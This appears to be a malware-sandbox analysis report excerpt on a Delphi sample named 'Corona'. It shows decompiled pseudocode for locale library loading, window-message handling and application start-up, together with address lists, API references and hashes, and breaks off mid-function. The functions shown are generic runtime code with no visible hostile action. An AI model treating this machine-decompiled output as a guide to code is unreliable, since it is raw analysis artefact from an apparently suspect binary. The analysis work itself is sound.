                                  0x0044a078
                                  0x0044a078
                                  0x0044a07b
                                  0x0044a08b
                                  0x0044a08e
                                  0x0044a090
                                  0x0044a092
                                  0x0044a092
                                  0x0044a090
                                  0x0044a0c9
                                  0x0044a0cb
                                  0x0044a0cb
                                  0x0044a0cf
                                  0x0044a0d1
                                  0x0044a0d1
                                  0x0044a0e1
                                  0x0044a0ea
                                  0x0044a0f7
                                  0x0044a100
                                  0x0044a100
                                  0x0044a10a
                                  0x0044a10d
                                  0x0044a118
                                  0x0044a11b
                                  0x0044a1ef
                                  0x0044a1f1
                                  0x0044a1f7
                                  0x0044a1fa
                                  0x0044a201
                                  0x0044a24a
                                  0x0044a24a
                                  0x0044a24d
                                  0x0044a24f
                                  0x0044a251
                                  0x0044a251
                                  0x0044a261
                                  0x0044a261
                                  0x0044a264
                                  0x0044a266
                                  0x0044a268
                                  0x0044a268
                                  0x0044a203
                                  0x0044a203
                                  0x0044a215
                                  0x0044a215
                                  0x0044a218
                                  0x0044a21a
                                  0x0044a21c
                                  0x0044a21c
                                  0x0044a21f
                                  0x0044a22f
                                  0x0044a22f
                                  0x0044a232
                                  0x0044a234
                                  0x0044a236
                                  0x0044a236
                                  0x0044a234
                                  0x0044a26b
                                  0x0044a26d
                                  0x0044a26f
                                  0x0044a26f
                                  0x0044a26f
                                  0x0044a271
                                  0x0044a273
                                  0x0044a275
                                  0x0044a275
                                  0x0044a275
                                  0x0044a28e
                                  0x0044a28e
                                  0x0044a121
                                  0x0044a121
                                  0x0044a126
                                  0x0044a129
                                  0x0044a12c
                                  0x0044a133
                                  0x0044a13b
                                  0x0044a141
                                  0x0044a146
                                  0x0044a148
                                  0x0044a14d
                                  0x0044a14d
                                  0x0044a148
                                  0x0044a150
                                  0x0044a152
                                  0x0044a18b
                                  0x0044a18b
                                  0x0044a18e
                                  0x0044a190
                                  0x0044a192
                                  0x0044a192
                                  0x0044a1a2
                                  0x0044a1a2
                                  0x0044a1a5
                                  0x0044a1a7
                                  0x0044a1a9
                                  0x0044a1a9
                                  0x0044a154
                                  0x0044a15a
                                  0x0044a15a
                                  0x0044a15d
                                  0x0044a15f
                                  0x0044a161
                                  0x0044a161
                                  0x0044a164
                                  0x0044a16d
                                  0x0044a16d
                                  0x0044a170
                                  0x0044a172
                                  0x0044a174
                                  0x0044a174
                                  0x0044a177
                                  0x0044a177
                                  0x0044a1ac
                                  0x0044a1ae
                                  0x0044a1b0
                                  0x0044a1b0
                                  0x0044a1b0
                                  0x0044a1b2
                                  0x0044a1b4
                                  0x0044a1b6
                                  0x0044a1b6
                                  0x0044a1b6
                                  0x0044a1c6
                                  0x0044a1cf
                                  0x0044a1d5
                                  0x0044a1d8
                                  0x0044a1dc
                                  0x0044a1e5
                                  0x0044a1e5
                                  0x0044a1dc
                                  0x0044a11b
                                  0x0044a297
                                  0x0044a2a8
                                  0x0044a37e
                                  0x0044a2ae
                                  0x0044a2b8
                                  0x0044a30b
                                  0x0044a31f
                                  0x0044a31f
                                  0x0044a334
                                  0x0044a33c
                                  0x0044a2ba
                                  0x0044a2bf
                                  0x0044a2ca
                                  0x0044a2d9
                                  0x0044a2e9
                                  0x0044a2e9
                                  0x0044a34a
                                  0x0044a359
                                  0x0044a359
                                  0x0044a2a8
                                  0x00449fe6
                                  0x0044a48f
                                  0x0044a492
                                  0x0044a495
                                  0x0044a49a
                                  0x0044a49d
                                  0x0044a4a4

                                  APIs
                                  • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 0044A2D9
                                    • Part of subcall function 0040597C: LoadStringA.USER32 ref: 004059AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: LoadMessageSendString
                                  • String ID: 6D
                                  • API String ID: 1946433856-480018528
                                  • Opcode ID: 8d6b6d8c45d6b2b3b563bcc4ef862751e939b853effc402ed7082f167f1b366c
                                  • Instruction ID: e4e10800a61aa60a658af10784f0615aae17927e59931d47e97f2c5840a4eab5
                                  • Opcode Fuzzy Hash: 8d6b6d8c45d6b2b3b563bcc4ef862751e939b853effc402ed7082f167f1b366c
                                  • Instruction Fuzzy Hash: 43F14B34A40244EFEB00DFA9CA85B9E77F4BB49304F1540B6E5009B362D779EE10DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004051E8, Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 396 4051e8-405219 lstrcpyn GetThreadLocale GetLocaleInfoA 397 405302-405309 396->397 398 40521f-405223 396->398 399 405225-405229 398->399 400 40522f-405245 lstrlen 398->400 399->397 399->400 401 405248-40524b 400->401 402 405257-40525f 401->402 403 40524d-405255 401->403 402->397 405 405265-40526a 402->405 403->402 404 405247 403->404 404->401 406 405294-405296 405->406 407 40526c-405292 lstrcpyn LoadLibraryExA 405->407 406->397 408 405298-40529c 406->408 407->406 408->397 409 40529e-4052ce lstrcpyn LoadLibraryExA 408->409 409->397 410 4052d0-405300 lstrcpyn LoadLibraryExA 409->410 410->397
                                  C-Code - Quality: 61%
                                  			E004051E8() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401294();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L0040129C();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401294();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401294();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401294();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                  0x004051e8
                                  0x004051f0
                                  0x004051f7
                                  0x004051f8
                                  0x0040520b
                                  0x00405210
                                  0x00405219
                                  0x00405302
                                  0x00405309
                                  0x0040522f
                                  0x0040522f
                                  0x00405235
                                  0x00405236
                                  0x00405243
                                  0x00405248
                                  0x0040524b
                                  0x00405247
                                  0x00000000
                                  0x00405247
                                  0x00405257
                                  0x0040525f
                                  0x00405265
                                  0x0040526a
                                  0x00405277
                                  0x0040527b
                                  0x0040527c
                                  0x0040527d
                                  0x00405292
                                  0x00405292
                                  0x00405296
                                  0x004052af
                                  0x004052b3
                                  0x004052b4
                                  0x004052b5
                                  0x004052c5
                                  0x004052ca
                                  0x004052ce
                                  0x004052d0
                                  0x004052e5
                                  0x004052e9
                                  0x004052ea
                                  0x004052eb
                                  0x004052fb
                                  0x00405300
                                  0x00405300
                                  0x004052ce
                                  0x00405296
                                  0x00000000
                                  0x0040525f

                                  APIs
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004051F8
                                  • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405205
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040520B
                                  • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405236
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0040527D
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0040528D
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004052B5
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004052C5
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004052EB
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004052FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1599918012-2375825460
                                  • Opcode ID: e7ccf738e9fc140108c117ea55436e3f1c143f05186227db9b8c309b92f3d244
                                  • Instruction ID: 3797dba1763956ffeb98ffb0881f4edfccbc60eb60ba4fedcf152278796cf33b
                                  • Opcode Fuzzy Hash: e7ccf738e9fc140108c117ea55436e3f1c143f05186227db9b8c309b92f3d244
                                  • Instruction Fuzzy Hash: F8316671E0065D6AEF25D5B8DC8ABEF67AC9B04344F0401FBA604F61C1D67C9E448F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432908, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 696 432908-432919 697 432933-43293b 696->697 698 43291b 696->698 701 432941-432949 697->701 702 432a16-432a1f call 42ef48 697->702 699 43298d-43299a call 42fa58 698->699 700 43291d-432920 698->700 718 432a64-432a6a 699->718 721 4329a0-4329cc call 406760 call 42e338 call 4327e0 699->721 704 432922-432923 700->704 705 432954-43295f call 444fdc 700->705 706 43294f 701->706 707 4329de-4329e9 call 432874 701->707 702->718 724 432a21 702->724 711 432925-432928 704->711 712 43297e-432982 704->712 713 432a5b-432a5f call 42fa58 705->713 725 432965-432973 705->725 706->713 707->713 727 4329eb-4329ef 707->727 722 432a23-432a33 call 434ef4 GetCapture 711->722 723 43292e 711->723 712->718 719 432988 712->719 713->718 719->713 721->718 746 4329d2-4329d9 721->746 722->713 733 432a35-432a3c 722->733 723->713 724->713 725->718 736 432979 725->736 727->718 730 4329f1-4329fa call 435154 727->730 730->718 741 4329fc-432a14 call 434ef4 NtdllDefWindowProc_A 730->741 733->713 737 432a3e-432a46 733->737 736->713 737->713 740 432a48-432a56 call 42f98c 737->740 740->713 741->718 746->718
                                  C-Code - Quality: 91%
                                  			E00432908(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E0042EF48(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						_t23 = E0042FA58(_t50, _t67); // executed
						return _t23;
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E00432874(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E00435154(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E00434EF4(_t50);
						_push(_t32);
						L00406294();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E0042FA58(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00406760( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0042E338(_t50,  &_v28,  &_v20);
					_t21 = E004327E0(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E00444FDC(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E00434EF4(__eax);
						if(_t45 == GetCapture() &&  *0x450a94 != 0) {
							_t47 =  *0x450a94; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x450a94; // 0x0
								E0042F98C(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}



















                                  0x0043290e
                                  0x00432910
                                  0x00432912
                                  0x00432914
                                  0x00432919
                                  0x00432938
                                  0x0043293b
                                  0x00432a18
                                  0x00432a1f
                                  0x00432a6a
                                  0x00432a6a
                                  0x00432a6a
                                  0x00432a5b
                                  0x00432a5f
                                  0x00000000
                                  0x00432a5f
                                  0x00432949
                                  0x004329e2
                                  0x004329e9
                                  0x00000000
                                  0x00000000
                                  0x004329ef
                                  0x00000000
                                  0x00000000
                                  0x004329f3
                                  0x004329fa
                                  0x00000000
                                  0x00000000
                                  0x004329ff
                                  0x00432a03
                                  0x00432a06
                                  0x00432a09
                                  0x00432a0e
                                  0x00432a0f
                                  0x00000000
                                  0x00432a0f
                                  0x00000000
                                  0x0043294f
                                  0x0043291b
                                  0x00432991
                                  0x0043299a
                                  0x00000000
                                  0x00000000
                                  0x004329a9
                                  0x004329b8
                                  0x004329c5
                                  0x004329cc
                                  0x00000000
                                  0x00000000
                                  0x004329d2
                                  0x00000000
                                  0x004329d2
                                  0x0043291d
                                  0x00432920
                                  0x0043295b
                                  0x0043295f
                                  0x00000000
                                  0x00000000
                                  0x0043296b
                                  0x00432973
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00432979
                                  0x00432922
                                  0x00432923
                                  0x00432982
                                  0x00000000
                                  0x00000000
                                  0x00432925
                                  0x00432928
                                  0x00432a25
                                  0x00432a33
                                  0x00432a3e
                                  0x00432a46
                                  0x00432a51
                                  0x00432a56
                                  0x00432a56
                                  0x00432a46
                                  0x00432a33
                                  0x00432928

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Capture
                                  • String ID:
                                  • API String ID: 1145282425-3916222277
                                  • Opcode ID: 2a0c31bde393de02a88b991aeff239c8a9a427775593c96d6b30ca319d01d185
                                  • Instruction ID: fb4889188739837e9bc115331c27bfaff8f64b720a9803afb2c6392ae9c02ced
                                  • Opcode Fuzzy Hash: 2a0c31bde393de02a88b991aeff239c8a9a427775593c96d6b30ca319d01d185
                                  • Instruction Fuzzy Hash: 1A318E313003428BDA34BA3D8B85B1B73D55B48314F14B93BB49AC7796DABCDD0A8B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044CEA8, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0044CEA8(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406294(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                  0x0044ceb4
                                  0x0044cebe
                                  0x0044cec7
                                  0x0044cece
                                  0x0044ced1
                                  0x0044ced2
                                  0x0044cedd
                                  0x0044cee1

                                  APIs
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0044CED2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4255912815-0
                                  • Opcode ID: 6dd4715fa70d21bc755ed0328dafae5a048de240b919829fb05e7bc1f4fafafb
                                  • Instruction ID: 9c238bd4b901fe08f225174a94e8842f97e48cad97f7cd3834223a09c594c5ea
                                  • Opcode Fuzzy Hash: 6dd4715fa70d21bc755ed0328dafae5a048de240b919829fb05e7bc1f4fafafb
                                  • Instruction Fuzzy Hash: D5F0C579205608AFDB40DF9DD588D4AFBE8BB4C260B058595B988CB321D234FD81CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00439B30, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103registrylibraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 85%
                                  			E00439B30(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x439ca8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E00408938("Delphi%.8X", 0,  &_v16,  &_v8);
				E00403EA0(0x452b20, _v8);
				_t25 =  *0x452b20; // 0x2131290
				 *0x452b1c = GlobalAddAtomA(E0040430C(_t25));
				_t29 =  *0x452664; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E00408938("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00403EA0(0x452b24, _v20);
				_t35 =  *0x452b24; // 0x21312ac
				 *0x452b1e = GlobalAddAtomA(E0040430C(_t35));
				_t38 =  *0x452b24; // 0x21312ac
				 *0x452b28 = RegisterClipboardFormatA(E0040430C(_t38));
				 *0x452b60 = E0041390C(1);
				E00439734();
				 *0x452b10 = E0043955C(1, 1);
				_t47 = E0044B5C4(1, __edi);
				_t78 =  *0x451104; // 0x452bb4
				 *_t78 = _t47;
				_t49 = E0044C6A8(0, 1);
				_t80 =  *0x450fc8; // 0x452bb0
				 *_t80 = _t49;
				_t50 =  *0x450fc8; // 0x452bb0
				E0044E290( *_t50, 1);
				_t53 =  *0x429690; // 0x429694
				E004130C0(_t53, 0x42b8f4, 0x42b904);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x4509d0 = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x439caf);
				E00403E4C( &_v20);
				return E00403E4C( &_v8);
			}
























                                  0x00439b39
                                  0x00439b3c
                                  0x00439b41
                                  0x00439b42
                                  0x00439b47
                                  0x00439b4a
                                  0x00439b56
                                  0x00439b59
                                  0x00439b67
                                  0x00439b74
                                  0x00439b79
                                  0x00439b89
                                  0x00439b93
                                  0x00439b98
                                  0x00439b9b
                                  0x00439ba4
                                  0x00439ba7
                                  0x00439bb8
                                  0x00439bc5
                                  0x00439bca
                                  0x00439bda
                                  0x00439be0
                                  0x00439bf0
                                  0x00439c01
                                  0x00439c06
                                  0x00439c17
                                  0x00439c25
                                  0x00439c2a
                                  0x00439c30
                                  0x00439c3b
                                  0x00439c40
                                  0x00439c46
                                  0x00439c48
                                  0x00439c51
                                  0x00439c60
                                  0x00439c65
                                  0x00439c74
                                  0x00439c78
                                  0x00439c85
                                  0x00439c85
                                  0x00439c8c
                                  0x00439c8f
                                  0x00439c92
                                  0x00439c9a
                                  0x00439ca7

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,00000000,00439CA8), ref: 00439B51
                                  • GlobalAddAtomA.KERNEL32 ref: 00439B84
                                  • GetCurrentThreadId.KERNEL32 ref: 00439B9F
                                  • GlobalAddAtomA.KERNEL32 ref: 00439BD5
                                  • RegisterClipboardFormatA.USER32 ref: 00439BEB
                                    • Part of subcall function 0041390C: RtlInitializeCriticalSection.KERNEL32(00411448,?,?,0041A3D5,00000000,0041A3F9), ref: 0041392B
                                    • Part of subcall function 00439734: SetErrorMode.KERNEL32(00008000), ref: 0043974D
                                    • Part of subcall function 00439734: GetModuleHandleA.KERNEL32(USER32,00000000,0043989A,?,00008000), ref: 00439771
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0043977E
                                    • Part of subcall function 00439734: LoadLibraryA.KERNEL32(imm32.dll,00000000,0043989A,?,00008000), ref: 0043979A
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004397BC
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004397D1
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004397E6
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004397FB
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00439810
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00439825
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0043983A
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0043984F
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00439864
                                    • Part of subcall function 00439734: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00439879
                                    • Part of subcall function 00439734: SetErrorMode.KERNEL32(?,004398A1,00008000), ref: 00439894
                                    • Part of subcall function 0044B5C4: GetKeyboardLayout.USER32(00000000), ref: 0044B609
                                    • Part of subcall function 0044B5C4: 72E7AC50.USER32(00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044B65E
                                    • Part of subcall function 0044B5C4: 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044B668
                                    • Part of subcall function 0044B5C4: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000), ref: 0044B673
                                    • Part of subcall function 0044C6A8: LoadIconA.USER32(00400000,MAINICON), ref: 0044C78D
                                    • Part of subcall function 0044C6A8: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00439C40,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044C7BF
                                    • Part of subcall function 0044C6A8: OemToCharA.USER32(?,?), ref: 0044C7D2
                                    • Part of subcall function 0044C6A8: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00439C40,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044C812
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 00439C6F
                                  • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00439C80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                  • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                  • API String ID: 2159221912-1126952177
                                  • Opcode ID: 15589a11e17b17599333cdc4bee61945cb1601364e99a8bb7522e29f288597ce
                                  • Instruction ID: c0984a276cde33582f5d26c7d9a167d02d8ef6303a66a86fbacce81158fd6b66
                                  • Opcode Fuzzy Hash: 15589a11e17b17599333cdc4bee61945cb1601364e99a8bb7522e29f288597ce
                                  • Instruction Fuzzy Hash: 69413174A003459FCB01EFA5D942A9E77F5EB49309B50553BE404E73A2DBB8AE00CB9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044C9B0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 132windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 42%
                                  			E0044C9B0(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
